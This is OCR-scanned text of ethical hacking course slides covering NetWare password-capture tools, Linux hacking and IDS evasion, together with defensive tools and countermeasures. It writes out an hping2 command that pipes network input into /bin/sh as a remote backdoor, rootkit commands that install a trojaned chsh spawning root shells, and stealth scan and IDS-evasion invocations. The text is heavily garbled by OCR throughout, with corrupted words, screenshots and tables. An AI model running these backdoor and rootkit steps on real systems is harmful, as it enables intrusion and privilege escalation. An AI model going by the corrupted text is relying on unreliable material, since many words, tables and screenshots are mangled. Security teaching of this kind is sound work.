U serDump si nnply I i sts al I users i n the Bi ndery. Works for 
Netware 3.x and 4.x (in Bindery Mode) 

© Hacking Tool: NWL 

Replacement LOGIN.EXE for Novell Netware. Run PROP. EXE 
from a Supervisor account to create a new property. 

Replace existi ng LOG! N .EXE i n SYS: LOG! N . 

Each timea user logs in, the text isstored in the new property. 
UsePROP.EXE to retrieve captured logins. 
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Hacking Tool: Getit 



© Getit is a hacl<i ng tool designed to capture passwords on 
a Novell network. 

0 This tool is triggered by an instanceoftheLOGIN.EXE 
application used in Novell to authenticate and begin a 
login session on a workstation. 

© 1 1 works d i recti y at the operati ng system I evel , 
i ntercepti ng cal Is to I nterrupt 21h. I t's probably the 
most well known NetWare hacking tool ever created. 
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Hacking Tool: Burglar, SetPass 



© It can only be used where an individual has physical 
access to the N etWare File server. 

0 The utility is usually stored on a floppy disk. The 
attacker sonneti nries has to reboot the server. 

© SetPass is a loadable module, designed to give the user, 
supervisor status. 

© This modulealso requires physical accesstothe 
machine. 
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Hacking Tool: Spooflog, Novelffs 



http:// www.gregmi I ler.net/ novel I .html 

0 Spooflog is a program, written in C, by Greg M iller, that 
can spoof a workstation into believing that it is 
communicati ng with the server. 

© This is a fairly advanced exploit. 

0 Novelffs creates a fake fi le server. 1 1 was written by 
Donar G E Alofs 

0 N eeds rebooti ng after work i s done. 
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H acki ng Tool : GobbI er 



Gobbler is a hacking tool which 'sniffs' network traffic on 
Novell servers. 
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C:\DOCUME~ 1V)wnerVylYDOCU~nE"miCA~1.3WOE241"1\GOBBLER\GOBBLER. EXE g|j 

The Beholder I DNPAP Netuork Management Monitor I TU Delft I Nou 11 1991 

nCapture Status= = 
I Dumpfile: pktcapt.dmp 



rrlnf 0= 



BUFFERS: APPLICATION PROGRAMS: 

S: 75 of 192 B^tes PhtCapt Start Shou 

L: 100 of 1514 Bytes FileUieu Stop Shou 
Free: 27362 B^tes 



PRE-FILTERS; 
All 
IP 



0 

2 0078 



163 



ters : 
0 packet 
ters : 
0 packet 



Max: 10240 
Max: 100 
Max: 100 

0 stop 

0 stop 



F^Hel^^9^Ke^^^sc^Cancel 



H acki ng Tool : Pandora 



0 Pandora is a set of tools for hacking, intruding and 
testing the security and insecurity of Novell Nel:ware4.x 
and 5.x. Pandora consists of two disti net sets of 
programs - an "online" version and an "offline" version. 

0 Features 

• Searches for target servers and grabs user accounts without 
logging in. 

• M ultiple DOS attacks and dictionary attacks against user 
account 

• Attaches to server with password hashes extracted f ronn Off I i ne 
progrann. 

• I nnproved spoofing and hijacking by using real-tinne sniffing. 

Si lently 'read' fi les as they are downloaded fronn server to cl lent. 
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Pandora Counter measure 



© The best protection agai nst this type of attack is 
estabi i shi ng and enforci ng a strong password pol i cy. 

© Physical access to a! I servers should be prevented. 
Remote management tools like RCONSOLE over SPX 
or RCONj or TCP/ 1 P should not be used. 

© I n Netware 5.x envi ronment, screen saver also gives 
good protection, because the screen saver requires an 
N DS username and password of a user with supervisor 
r i ghts to the server to I og i n . 
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Summary 



© Al I parts of the overal I N etWare system are obj ects. E ach obj ect i n 
the security model has an Access Control List, or ACL. Objects are 
clustered together in an overall hierarchy. There are a total of five 
different levels of access that can be logical ly defi ned from the 
security model - not logged in, logged in, supervisory access, 
administrative access, and console access. 

© NetWare server(<=4.X) by design itself does not offer much in the 
way of protection as there is no means of auditi ng events done at 
the console. This is a physical security concern. 

© There is a security concern as the supervisor account password is 
the same as the f i rst password for the Admin user until it is 
changed using a bindery administration utility. 

© Similar concerns in Novell are exploited by vigilant attackers. 

© N ovel I Password cracki ng tool s can provi de the attackers wi th 
room for further actions. 
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Ethical Hacking 



ModuleXVIII 
Linux Hacking 



Module Objective 



© Why Linux? 

© Compiling Programs in Linux 

© Scanning Networks 

© Mapping Networl<s 

© Password Cracl<ing in Linux 

© SARA 

© TARA 

© Sniffing 

© A Pinger in disguise 

© Session Hijacl<ing 

© Linux Rootkits 

© IP Chains and IP Tables 

© Linux Security Countermeasures 
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Why Linux? 



0 M ajority of servers around the globe are runni ng on 
Linux/ Unix-like platfornns 

0 Easy to get and Easy on pocket 

0 There are many types of L i n ux- D i str i buti ons / D i stros / 
Flavors such as Red Hat, Mandrake, Yellow Dog, 
Debian etc. 

0 Source code is aval I able 

0 Easy to modify. 

0 Easy to develop a program on Linux. 
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Compiling Programs in Linux 



© There are general I y 3 steps to compi I i ng 
programs under Linux. 

1 Configuring how the program will be complied 

2. Compi ling the program 

3. I nstal I i ng the program 

$ . /configure 
$ make 
$ su 

Password 

$ make install 

$ exit 



BI-Gouncil 



Scanning Networks 



0 Once the I P address of a target system is known, an 
attacker can begi n the process of port scanni ng, looki ng 
for holes in the system through which the attacker can 
gai n access. 

© A typical system has 2^16 -Iport numbers and oneTCP 
port and one U DP port for each number. 

© Each one of these ports are a potenti al way i nto the 
system. 

© The most popular Scanning tool for Linux is N map. 
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Hacking Tool: Nmap 



htt p : / / www. i n secu re. org/ n map 
© Stealth Scan, TCP SYN 

nmap -v -sS 192.168.0.0/24 

© U DP Scan 

nmap -v -sU 192.168.0.0/24 

© Stealth Scan, No Ping 

nmap -v -sS -PO 192.168.0.0/24 

© Fingerprint 

nmap -v -0 192.168.0.0/24 #TCP 
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Scanning Networks 



©One essenti al type of tool for 
any attacker or defender is the 
vul nerabi I i ty scanner. 

©These tool al I ow the attacker to 
connect to a target system and 
check for such vulnerabilities as 
configuration errors, default 
configuration settings that allow 
attackers access, and the nnost 
recently reported systenn 
vulnerabilities. 

©The preferred open-source tool 
for thisisNessus. 

©Nessus is an extremely 
powerful network scanner. It can 
also be configured to run a 
variety of attacks. 



Nessus portscanning/attack status 



grincheuK .fr .nessus .org 



Portscan : 
Attack : 
Security check : 



[ Stop ] 



infosrch.cgi 



prof.fr.ne33U3.org 



Portscan : 
Attack : 
Security check : 



L StoTl 



Netscape Server ?PageService3 bug 



dornneur.fr.nessus.org 



Portscan : 
Attack : 
Security check : 



mstream agent Detect 



M 

gatey/a/ .fr .nessus .org 



Portscan : 
Attack : 
Security check : 



[ Stop J 



Quote of the daj/ 



bonsai.fr.nessus.org 



Portscan : 
Attack : 
Security check : 



Stop 



S MB use domain SID to enumerate users 



Stop the whole test 
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Cheops 





Iheops Network User Interface 




Fjle Page 


Help 


Friends 






gink.cse 
dni 01 at.cse 
dni 01 an.cse 



131.204.208.1 



207.230.72.26 



207.230.72.8 



iSaved 7rooV.cheops-map' 
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Port scan detection tools 



© Scanlogd - detects and logs TCP port scans. 

http:// www.openwal I .com/ scanlogd/ 

Scanlogd only logs port scans. 1 1 does not prevent them. 
You will only receive summarized information in the 
system's log. 

0 Abacus Portsentry 

http:/ / www. psi on i c. com/ abacus/ portsentry/ 

Portscan detection daemon Portsentry has the ability to 
detect port scans (including stealth scans) on the 
network interfaces of your server. Upon alarm it can 
block the attacker via hosts.deny, dropped route or 
firewall rule. 
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Password Cracking in Linux 



0 X crack 

(http:// packetstorm.l i nuxsecurity.com/ Crackers/ ) 

0 Xcrack doesn't do much with rules. 

0 1 1 wi 1 1 f i nd any passwords that match words i n the 
dictionary file the user provides, but it won't apply any 
combinations or modifications of those words. 

0 1 1 i s a comparati vel y fast tool . 
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H acki ng Tool : J ohn the Ri pper 



http:// www.openwal I .com/ j ohn/ 

© J ohn the Ri pper requi re the user to have a copy of the 
password file. 

0 This is a relatively fast password cracker, and the most 
popular amongst the hacker community. 

Cracki ng ti mes, usi ng the def au 1 1 d i cti onar i es that come 
with the Li nux system are as fol lows: 

User ecc with password eccecc took less 
than a second. 

User root with password doodle took less 
than 2 seconds. 
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SARA (Security Auditor's Research 
Assi stant) 



http://www-arc.conn/sara 

© TheSecurityAuditor'sResearch Assistant (SARA) is a 
third generation Unix-based security analysis tool that 
supports the FBI Top 20 Consensus on Security. 

© SARA operates on nnost Unix- type platfornns including 
Linux & Mac OS X 

© SARA is the upgrade of SATAN tool . 

© Getting SARA up and running is a straight forward 
connpilation process, and the rest is done via a browser. 
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© http:/ / repti I e. rug. ac. be/ ^coder/ sn i ff i t/ sn i ff i t. html 

© Sniffit is one of the most famous and fastest Ethernet 
sniffers for Linux. 

© You can run it either on the command line with optional 
plug- ins and filters or in interactive mode, which is the 
preferred mode. 

© The interactive mode of Sniffit allows you to monitor 
connections in real-time and therefore sniff real-time 
too! 

Note: Remember to download the patch and then 
recompile Sniffit for optimum results! 



Hacking Tool: HPing2 



http://www.hping.org 

© H pi ng i s a command- 1 i ne ori ented TCP/ 1 P packet 
assembly/ analyzer. 

© M ore commonly known for its use as a pi ngi ng uti I ity, 
H Ping carries a hidden but handy usage, that is a 
Backdoor Trojan. 

© J ust enter the foil owing command on your victim 

$ . /hping2 -I eth) -9ecc | /bin/sh 

Then Telnet into any port of your victim and invoke 
commands remotely on your victim's host by preceding 
any U n i x/ L i n ux commands wi th ecc 

$ telnetvictim.com 80 

$ eccecho This Text imitates a trojan shovel 
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Session Hijacking 



© Using a combination of sniffing and spoofing 

techniques, session hijacking tools allow an attacker to 
steal a valid, established login session. 

© Examples of such sessions are Tel net and FTP 

sessions. With a successful session hijacking attempt, 
the vi cti m's I ogi n sessi on van i shes and he usual I y 
attributes it to network problems and logs in again. 

© There are general I y two types of Session H ijacki ng 
Techniques: 

1 H ost- Based Sessi on H i j acl<i ng 
2. Networl<- Based Session H ijacl<ing 
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Hacking Tool: Hunt 



http:/ / 1 i n .f si d .cvut.c^ ^ra/ i ndex. html 

© One of H unt's advantages over other session hijacki ng tools is that 
it uses techniques to avoid ACK stornns. 

© H unt avoids this ACK stornn and the dropping of the connection by 
usi ng ARP spoof i ng to estabi ish the attacker's machi ne as a relay 
between Source and Destination. 

© N ow the Attacker uses H unt to sniff the packets the Source and 
Destination sends over this connection. The Attacker can choose to 
acts as a relay and forward these packets to thei r i ntended 
destinations, or he can hijack the session. 

© The attacker can type i n connnnands that are forwarded to 
Destination but which the Source can't see. Any connnnands the 
Source types in can be seen on the Attacker's screen, but they are 
not sent to Desti nation. Then H unt al lows the attacker to restore 
the connection back to the Source when h^she is done with it. 
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Linux Rootkits 



© One way an i ntruder can mai ntai n access to a 
compromised system is by installing a rootkit. 

0 A rootkit contai ns a set of tools and replacement 
executables for many of the operati ng system's critical 
components, used to hide evidence of the attacker's 
presence and to give the attacker backdoor access to the 
system. 

© Rootkits requi re root access to i nstal I , but once set up, 
the attacker can get root access back at any ti me. 
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Linux Rootkitv4(LR4) 



© Linux Rootkit is IV the latest version of a well known trojan package for Linux 
system. The rootkit comes with following utility programs and trojaned system 
commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall, 
linsniffer, login. Is, netstat, oasswd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, 
wted, z2 

© In the example below we will try the change shell command (chsh). Compileonly 
chsh in chsh-di rectory and use 'fix' to replace the original with the trojan version. 

$ make 

gcc -c -pipe -02 -m486 -fomit -frame-pointer -I. -I - 
DSBINDER=\ "\" -DUSRSBINDER=\ "\" -DLOGDIR=\ "\" -DVARPATH=\ 
"\" chsh.c -o chsh.o 

gcc -c -pipe -02 -m486 -fomit -frame-pointer -I. -I - 
DSBINDER=\ "\" -DUSRSBINDER=\ "\" -DLOGDIR=\ "\" -DVARPATH=\ 
"\" setpwnam.c -o setpwnam.o 

gcc -s -N chsh.o setpwnam.o -o chsh 

$../fix /usr/bin/chsh ./chsh . . /backup/chsh 

© Once done, the chsh command wi 1 1 spawn a root shel I to any user who logs on to 
the Linux System 
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Rootkit Countermeasures 



chkrootkit is a tool to 
locally check for signs of 
a rootkit. 

1 1 contai ns chkrootkit a 
shel I scri pt that checks 
system binaries for 
rootkit modification. 




chkrootkit 



htt p : / / www. ch kroot ki t . org/ 



chkrootkit detects the following 
rootkits 



1 


111 11.^ 11-C 

]rk3, hkA, IrkS^ 


15. 


jdsc-rootkit; 




lrk6 (and some 


20. 


Ducoci icotkit, 




J. \ 

vari£tnts); 


21. 


ITT 

K c Worm; 


2 


^1 E ■ 

Solar35 rootfcit; 


22. 


RST.b trojan; 


3. 


FreeBSD rootkit; 


23. 


duarawkz; 




tOrn (including 


i4 


ki^ark LKM, 




some varianfs 


25. 


Monkit; 




and torn v8); 


26. 


Hidrootkit; 


5 


Ambient'^ 




Bobkit, 




Rootkit for 


27. 


Pizdakit; 




Linux (AKK); 


28 


turn (v3 0 


6. 


Ramen "Worm; 




variant); 


/ 


rh[67]-shaper; 




inowtee^ 


3 


RSHA; 


30. 


Optickit, 


9. 


Ron^anian 


31. 


T.RE; 




rootkit; 




MithRa $ 


10. 


RK17;Lion 




Rootkit, 




Worm; 


33. 


George; 


11. 


Adore Worm; 


34. 




12. 


LPD Worm; 


35. 


Scalper 


13 


kenrty-rk; 




(FreeBSD/ Apach 


14. 


Adoj-e LEM; 




e chunked 


15. 


ShitC Worm; 




encoding worm); 


16. 


Omega Worm; 


36. 


Slapper A, B, C 


17. 


Wormkit Worm; 




andD 


18 


Maniac-KK, 







37 (J^inux/ Apache 
mod_ssl Worm); 

38. OpenBSDrk vl; 

39. Illogic rootkit; 
-10. SE lootkit. 

^1 sebekLKM. 
A2. Romanian 

rootkit; 
43 LOCrootkEi, 




chkrootkit 
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Linux Firewall: IPChains 



© I PChai ns i s a very general TCP/ 1 P packet f i Iter, 1 1 al I ows 
you to ACCEPT, DENY, MASQ, REDIRECT, or 
RETURN packets. 

© There are three chains that are always defined: input, 
output and forward. 

© The chai n is executed whenever a packet is desti ned for 
a network i nterface: 

• the output chai n is executed whenever a packet is exiti ng a 
network interface, destined elsewhere 

• the forward chai n i s executed whenever a packet must traverse 
between mu I ti pi e i n terf aces 

© Chains are just rule sets that are executed in order, 
whenever a packet matches a rule then that specific 
target is executed. 
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© I PTabI es i s the repi acement of userspace tool i pchai ns 
in the Linux 2.4 kernel and beyond. I PTables has many 
more features than I PChains. 

© Connection tracking capability, i.e. the ability to do 
stateful packet inspection. 

© Simplified behavior of packets negotiating the built-in 
chains (I NPUT, OUTPUT and FORWARD) 

© A clean separation of packet filtering and network 
address translation (NAT). 

© Rate-limited connection and logging capability 

© The abi I i ty to filter on tcp flag and tcp options, and also 
MAC addresses. 



Linux Tools: Application Security 



© Whisl<er (http://www.wiretrip.net) 

Rai n.Forest.Puppy's excellent CGI vul nerabi I ity scanner. 

© Flawfinder (http://www.dwheeler.com/flawfinder/) 

Flawfinder isa Python program which searches through sou ircve code for 
potential security flaws, listing potential security flaws sorted by risk, with the 
most potentially dangerous flaws shown first, this risk level depends not only on 
the function, but on the values of the parameters of the function. 

© StackGuard (hhtp:// www.immunix.org) 

StackGuard is a compiler that emits programs hardened against "stack smashing" 
attacks. Stack smash i ng attacks are a common form of penetration attack. 
Programs that have been compiled with StackGuard are largely immune to stack 
smashing attack. Protection requires no source code changes at all. 

© L i bsaf e ( http:/ / www.avayal abs.com/ proj ect/ 1 i bsafe/ i ndex. html ) 

1 1 is general ly accepted that the best sol ution to buffer overflow and format stri ng 
attacks is to fix the defective programs. 
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Linux Tools: Intrusion Detection 
Systems 



© Tri pwi re ( http://www.tri pwi re.com) 

A fi le and di rectory i ntegrity checl<er. 

© L I DS ( http:// www.turbol i nux.com.cn/ 1 i ds/ ) 

The LIDS (Linux Intrusion Detection System) is an intrusion detection 
/ defense system i n the Li nux l<ernel . The goal is to protect Li nux systems 
disabi i ng some system cal Is i n the kernel itself. 

© AIDE (http://www.cs.tut.fi/ ^rammer/ aidahtml) 

Al DE (Advanced I ntrusion detection Environment) is an Open Source I DS 
package. 

© Snort (http://www.snort.org) 

Flexiblepacketsniffer/ logger that detects attacks, snort isa libpcap-based 
packet sniffer/ logger which can be used as a lightweight Network I ntrusion 
Detection System. 

© Samhain (http://samhain.sourceforge.net) 

Samhain is designed for intuitive configuration and tamper- resistance, and 
can be configured as a client/ server application to monitor many hosts on a 
network from a si ngl e central I ocati on . 
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Linux Tools: Security Testing Tools 



■ 



© NMap (http://www.insecure.org/nnnap) 

Prenni er networl< auditi ng and testi ng tool . 
© LSOF (ftp://vic.cc.pudue.edu/pub/tools/unix/lsof) 

LSOF I i sts open f i I es f or r u n n i ng U n i x/ L i n ux processes. 

© Netcat (http://www.atstake.conn/research/tools/index.htnnl) 

Netcat is a si nnple Unix uti I ity which reads and writes data across network 
connections, using TCP or UDP protocol. 

© Hping2 (http://www.kyuzz.org/ antire^hping/) 

hping2 is a network tool able to send custonn I CMP/ U DP/TCP packets 
and to d i spl ay target repi i es I i ke pi ng does wi th I CM P repi i es. 

© N ennesi s ( http:/ / www. packetn i nj a. net/ nennesi s/ ) 

The Nennesis Project is designed to bea connnnand-line based, portable 
hunnan IP stack for Unix/ Linux 
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Linux Tools: Encryption 



0 Stunnel (http://www.stunnel.org) 

Stunnel is a program that allows you to encrypt arbitrary TCP 
connections inside SSL (Secure Sockets Layer) available on both Unix 
and Windows. Stunnel can allow you to secure non-SSL aware 
daemons and protocols (like POP, I MAP, NNTP, LDAP, etc) by having 
Stunnel provide the encryption, requiring no changes to daemon's 
code. 

0 OpenSSH /SSH (http://www.openssh.com/) 

SSH (Secure Shel I is a program for loggi ng i nto a remote machi ne and 
for executi nmg commands on a remote machi ne. 1 1 provides secure 
encrypted communications between two untrusted hosts over an 
insecure network. 

0 GnuPG (http://www.gnupg.org) 

GnuPG is a complete and free replacement for PGP. Si nee it does not 
use the patented I DEA algorithm, it can be used without any 
restrictions. 



Bl-Council 



L J 



Linux Tools: Log and Traffic Monitors 



© MRTG (http://www.nnrtg.org) 

The ivi ulti-Router Traffic Grapher (M RTG) is a tool to nnonitor the 
traffic load on network- 1 inks. 

© Swatch (http://www.stanford.edu/ ^atkins/ swatch/) 

Swatch, the si nnple watch daennon is a progrann for Unix system 
logging. 

© Ti nnbersee http://www.fastcoder.net / ^hunnper/ softwara^ 
sysadnni n/ ti nnberse^ ) 

Ti nnbersee is a progrann very si nni lar to the Swatch progrann. 

© Logsurf (http://www.cert.dfn.d^eng/logsurf/) 

The progrann log surfer was designed to nnonitor any text-based 
logfileson thesystenn in realtinne. 

© TCP Wrappers (ftp://ftp.prcupine.org/pub/security/index.htnnl) 

Wietse Venenna's network logger, also known asTCPD or LOG_TCP. 
These progranns log the client hostnanne of inconning telnet, ftp, rsh, 
riogin, finger etc. requests. 
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Linux Tools: Log and Traffic Monitors 



© I PLog (http://ojnk.sourceforge.net/) 

iplog is aTCP?l P traffic logger. Currently, it is capable of logging 
TCP, U DP and! CM P traffic. 

0 I PTraf (http://cebu.mozcom.com/ ri ker/ i ptraf/ ) 

I PTraf is an ncurses based I P LAN monitor that generates various 
network statistics including TCP info, UDP counts, I CMP and 
OSPF information, Ethernet load info, node stats, I P checksum 
errors and others. 

© Ntop (http://www.ntop.org) 

ntop is a Unix/ Linux tool that shows the network usage, similar to 
what the popular "top" Unix/ Linux command does. 
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Li nux Security Countermeasures 



Fhvaical Secuxi.'tY : 

lock your computer physical in a secure place. 
Pasaword Security ; 

Do not assign easy-to-guess password. 

Do not share your account with other person. 

Check user account with null passwd (without passwd) in /etc/shadow. 
Wet work. S e c u r it y : 

Close the door firat by denying access from network, by default. 
$ cat "ALL: ALL" » /etc /hosts. deny 

Stop all unused services such as sendmail, NFS. 

$ chkconfig — list 

$ chkconfig — del send mail 

$ chkconfig — del nf slock 

S chkconfig — del rpc 

Check system logs in /var/log regularly especially /var/ log/ secure. 

Update vour Linux svstea regularly. 
Checking the errata (bug fixes) in 
http: / /www. redhat. com/ support/ errata 

The update packages can be found in ftp://updates.redhat.com 
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Summary 



© Linux is gaining popularity and is fast becoming a stable industry 
strength OS. 

© Once the I P address of a target system i s known, an attacker can 
begi n port scanni ng, looki ng for holes i n the system for gai ni ng 
access. N map bei ng a popular tool . 

© Password cracking tools are aval I able for Linux as well. 

© Sniffers as well as Packet assembly/ analyzingtoolsfor Linux 
provide attackers with theedgethatthey have dealing with other 
OSs. 

© Attackers with root privi leges can engage i n session hijacki ng as 
well. 

© Trojans, backdoors, worms are also prevalent i n the Li nux 
environment. 

© As with any other system, a wel I developed i ntegrated procedure is 
to be put in pi ace to counter thethreats that exist. 
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Ethical Hacking 



ModuleXIX 

Evading I DS, Firewalls 
and H oney pots 



Module Objective 



© I ntrusion Detection System 
© System I ntegrity Verifiers 
© H ow are I ntrusions Detected? 
© Anomaly Detection 
© Signature Recognition 

© How does an IDS match Signatures with incoming 
Traffic? 

© P rotocol Stack Ver i f i cati on 

© Application Protocol Verification 

© Hacking Through Firewalls 

© IDS Software Vendors 

© Honey Pots 
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I ntrusion Detection Systems (I DS) 



0 I ntrusion Detection Systems (I DS) monitors packets on 
the network wi re and attempts to discover if a 
hacker/ hacker is attempti ng to break i nto a system (or 
cause a den i al of servi ce attack) . 

0 A typical example is a system that watches for large 
number of TCP connection requests (SYN) to many 
different ports on a target machine, thus discovering if 
someone is attempti ng a TCP port scan. 
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^■■illl 



0 System I ntegrity 
Verifiers ( SI V) monitor 
system f i I es to f i nd when 
an intruder clianges. 

0 Tripwire is one of the 
popular SI Vs. 

0 SI Vs may watch other 
components such as 
Wi ndows regi stry as wel I 
as chron configuration to 
find known signatures. 
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1. Install & 
Customize 
Tripwire 



Z. Initialize 
Tripwire 
Database 



I 



3. Run 
Integrity 
Check 



6. Update 
Tnpwire 
Database 



Yes 




4. Examine 
Tripwire 
Report 




7. Update 
Policy 
File 



No 



No 



5. Take 
Appropriate 
Security 
Measures 



Intrusion Detection 



Anomaly Detection 

0 The idea behind this 
approach is to measure a 
"base! i ne" of such stats as 
CPU utilization, disl< 
activity, user logins, file 
activity, and so forth. 

0 The benefit of this 
approach is that it can 
detect the anonnal i es 
without having to 
understand the underiyi ng 
cause behind the 
anomalies. 



Signature Recognition 

0 This means that for every 
hacker technique, the 
engi neers code somethi ng 
i nto the system for that 
technique. 

0 This can be as simple as a 
pattern match. The classic 
exampi e i s to exami ne 
every packet on the wi re for 
the pattern "/cgi-bin/phf?" 
which indicates an attempt 
to access this vulnerable 
CGI script on a web-server. 
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H ow does an I DS match signatures 
with incoming traffic? 



© Traffic consists of I P datagrams flowing across 
a networl<. 

© An I DS is ableto capture those pacl<ets as they 
f I ow by on the wi re. 

© An I DS consists of a special TCP/ 1 P stack that 
reassembles I P datagrams and TCP streams. 1 1 
then appi i es some of the fol I owi ng techni ques: 

• Protocol stack verification 

• Application protocol verification 

• Creating new I oggable events 
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L J 



P rotocol Stack Ver i f i cati on 



© A number of intrusions, 
such as "Ping-O-Death" 
and "TCP Stealth 
Scanning" use violations 
of the underlying IP, 
TCP, U DP and I CMP 
protocols in order to 
attack the machine. 

© A simple verification 
system can f I ag i n val i d 
packets. This can include 
valid, by suspicious, 
behavior such as 
severally fragmented I P 
packets. 
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Application Protocol Verification 



© A number of intrusions use invalid protocol behavior, 
such as "Win Nuke", which uses NetBI OS protocol 
(adding OOB data or DNS cache poisoning, which has a 
valid but unusual signature. 

© I n order to effectively detect these intrusions, an I DS 
must re- i mpl ement a wi de var i ety of appi i cati on- 1 ayer 
protocols in order to detect suspicious or invalid 
behavior. 
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What happens after an I DS detects an 
attack? 



1 Configure firewall tofilter out the IP address of the intruder. 

2. Alert user / administrator (sound / e-mail / Page). 

3. Write an entry i n the event log. Send an SN M P Trap datagram 
to a management console I i ke H P Open view or Ti vol i . 

4. Save the attack i nformation (ti mestamp, i ntruder I P address, 
Victim I P address/ port, protocol information). 

5. Save a tracef i I e of the raw packets for I ater anal ysi s. 

6. Launch a separate program to handle the event 

7. Terminate the TCP session - Forge a TCP Fl N packet to force a 
connection to terminate. 
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I DS Software Vendors 



© Black I CE by Network I CE (http://www.networkice.com) 

0 CyberCop M onitor by Network Associates, I nc. 
(http://www.nai.conn) 

© RealSecure by I nternet Security Systenns (I SS) 
( http :/ / www. i SS. net) 

© NetRanger by WheelGroup/ Cisco (http://www.wheelgroup.conn) 

© eTrust I ntr usi on Detecti on by Computer Associ ates 
(http://www.cai.com) 

© NetProwler by Axent (http://www.axent.com) 

© Centrax by Cybersafe ( http:/ / www.cybersafe.com) 

© NFR by Network Flight Recorder (http://www.nfr.net) 

© Dragon by Security Wizards (http://www.network-defense.com) 
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Snort (http://www.snort.org) 



© Snort is an Open Source I ntrusion Detection System 

© 1 1 contai ns over tliousand signatures, and can be downloaded at 
littp:/ / www.snort.orci/ cqi - bi n/ donacgi 

© Cliecl< out tlie foil owing example: 

In this example of PHF attack detection, a straight text string is 
searched for in theapp layer 

Alert tcp any any -> 192.168.1.0/24 80 (msg: ''PHF 
attempt" ; content: 'Vcgi-bin/phf ; ) 

1 1 gives an alert, that a TCP connection from any I P address and 
any port to the 192. 168. Ix subnet to port 80. 

1 1 searches for the content "/ cgi - bi n/ phf " anywhere i n the content. 
I f it f i nd such content, it wi 1 1 alert the console with a message 
"PHF attempt" 
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Evading I DS Systems 



0 M any simple network intrusion detection systems rely 
upon "pattern matching". 

© Attack scripts have well known patterns, so simply 
compi I i ng a database of the output of known attack 
scri pts provide pretty good detection, but can easi ly be 
evaded by si mply changi ng the scri pt. 

© I DS evasion focuses on foi I i ng signature matchi ng by 
altering an attacker' s appearance. 

For example, some P0P3 servers are vulnerable to a 
buffer overflow when a long password is entered. It is 
easy to evade si mply by changi ng the attack scri pt. 
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Complex I DS Evasion 



© An i ntruder nnight send a TCP SYN packet that the I DS sees, but 
the victinn host never sees. 

© ThiscausesthelDStobelievetheconnection isclosed, but when in 
fact it is not. Si nee TCP connections do not send "keep-alives", the 
intruder could wait hours or days after this "close" before 
conti nui ng the attack. 

© The f i rst attack i s to f i nd a way to pass packets as far as the I DS, 
and cause a later router to drop packets. 

© This depends upon the router configuration, but typical exannples 
include lowTTL fields, fragnnentation, source routing, and other I P 
options. 

© I f there is a slow I i nk past the I DS, then the hacker can flood the 
link with high priority I P packets, and send theTCP Fl N as a low 
priority packet - the router's queuing nnechanisnn will likely drop 
the packet. 
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H acki ng Tool : f ragrouter 



0 F ragrouter i s a program for routi ng network traff i c i n 
such a way as to elude most network intrusion detection 
systems. 

© F ragrouter al I ows attacks to avoi d detecti on by network 
intrusion detection systems. 

©For exmple, the F ragrouter could be used to obfuscate a 
phf attack agai nst a web server, a buffer overflow attack 
against a DNS server, or any number of other attacks. 

fragrouter [ -i interface ] [ -p ] [ ATTACK 
] host 
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H acki ng Tool : TcprepI ay 



http://sourceforge.net/ projects/ tcprepi ay/ 

© TcprepI ay i s a set of U N I X tool s whi ch all ows the 
replayi ng of captured network traffic. 

© 1 1 can be used to test a vari ety of network devi ces 
including routers, firewalls, and Nl DS. 

tcpreplay [ -i intf ] [ -1 loop count ] [ 
-r rate | -m multiplier ] file . . . 
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Hacking Tool: SideStep.exe 



http:/ / www. robertgrahann.com/ tmp/ si destep. html 

© Sidestep is a hacl<ing tool which evades network I DS in a 
completely different manner compared to fragrouter. 

c : \ >3ide3tep 

Sidestep vl-O Copyright (c) 2000 toy Network ICE 
http : / / www - robert graham - com/ tanp/s idestep - html 
usage : 

sidestep <t^iL"cjet> [<options>] 
Sends attacks at the target that evades an IDS r 
One of the foltoT^ring protocols/attacks must toe specified: 

-rpc RPC PortHap DUMP 

-ftp FTP CD -root 

-dns DHS vers ion- to ind qiieiry 

-snmp SHUP tanman user enum 

— ht tp /cgi-bin/p hf 

'to o E a c kOr l C l c e pi ng 

-all 

One o± three t^iocies musu be specif leci^ 
-norxn Does no evasion (noctriai auu&tks) 

-evade AccetripTis ^^o attack catrgeT: evading the IDS 

-laise Does noT^ aT:^tatic the sv^Tiem at aii (lEai^se positive) 

Ex amp le i 
3 i de step lD*0-Q-l — evade - d n 3 

Queries DNS setrver for version mfo evading IDS 
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H acki ng Tool : Anzen N I DSbench 



http://www.anzen.com/ research/ nidsbench/ 

© Contai ns "fragrouter" that forces al I traffic to fragment, 
which demonstrates how easy it is for hacl<ers/ cracl<ers 
to do the same i n order to evade i ntr usi on detecti on . 

© Thi s accepts i ncomi ng traff i c then fragments it 
according to various rules (I P fragmentation with 
various sizes and overlaps, TCP segmentation again 
with various sizes and overlaps, TCP insertion in order 
to de-synchronize the connection, etc.) 
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H acki ng Tool : ADM utate 



http://www.ktwo.ca/security.html 

©ADM utate accepts a buffer overflow exploit as 
i nput and randomly creates a functional ly 
equivalent version which bypasses I DS. 

© Once a new attack is known, it usually takes the 
I DS vendors a number of hours or days to 
develop a signature. But in the case of 
ADM utate, it has taken months for signature- 
based I DS vendors to add a way to detect a 
polymorphic buffer overflow generated by it. 
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Tools to i nject strangely formatted 
packets on to the wi re 



© Libnet (httpV/www.packetfactory.net/libnet) 

© Rootshell (http://www.rootshell.conn) 

© IPsend (http://www.coonnbs.anu.edu.au/ ^avalon) 

© Sun Packet Shell (psh) Protocol Testing Tool 
( http : / / www. pi aygrou n d . su n . conn/ psh ) 

© Nel:::RawlP (http://www.quake.skif.net/RawlP) 

© CyberCop Scanner's CASL (http://www.nai.conn) 
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What do I do when I have been 
hacked? 



© Incident response team 

Set up an "incident response teann". Identify those people who 
should be called whenever people suspect an intrusion in progress. 

© Response procedure 

You need to decide now what your priorities are between network 
uptinneand intrusion. Can you pull the network plug whenever you 
strongly suspect intrusion? Do you want to allow continued 
i ntrusi on i n order to gather evi dence agai nst the i ntruder? 

© Lines of connnnunication 

Do you propagate the infornnati on up the corporate food chain 
fronn your boss up to the CEO, Do you infornn the FBI or police? Do 
you notify partners (vendors/ custonners) 
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H acki ng through f i rewal Is 



■ 



0 One of the easiest and most connnnon ways for an 
attacker to si i p by a f i rewal 11 s by 1 nstal 11 ng some 
network software on an internal system that 
communicates using a port address permitted by the 
firewall's configuration. 

0 A popular port to use is port 53 TCP, normally used by 
DNS. 

0 M any fi rewal Is permit al I traffic usi ng port 53 by 
default because it simplifies firewall configuration and 
reduces support calls. 
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Bypassi ng F i rewal I usi ng H ttptunnel 



